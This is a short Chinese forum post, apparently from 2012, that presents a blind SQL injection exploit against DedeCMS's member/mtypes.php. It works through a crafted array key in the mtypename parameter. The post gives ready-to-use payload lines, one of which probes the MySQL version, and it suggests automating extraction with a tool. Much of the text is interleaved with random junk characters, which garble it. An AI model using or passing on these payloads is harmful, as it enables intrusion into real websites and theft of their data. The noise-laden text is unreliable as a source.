需要magic_quotes_gpc = Off,所以说是鸡肋啊.
# U% Q7 M8 U( X7 H" e# G
& t9 O( v% H2 j" i! `% d + o9 v: E4 l+ P2 ?+ f' w
发生在数组key里的注射漏洞,有点意思.# A5 H( z$ H+ K
2 {; m# G/ C& h5 f
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
# M( c7 }# J8 P
0 Q/ ^( ^4 Y. g* K2 u/ Vhttp://www.xxx.com /dede/member/mtypes.php?dopost=save" X3 M! a6 w X4 H9 j8 b
T" Q( u7 u' o% Kexploit:: g8 z. ?, y# g7 X+ S
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r J2 N' B/ q; A
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
/ c% u% u9 y( f* R6 q* l6 h |
发表于 2012-12-20 08:08:09
收藏
支持
反对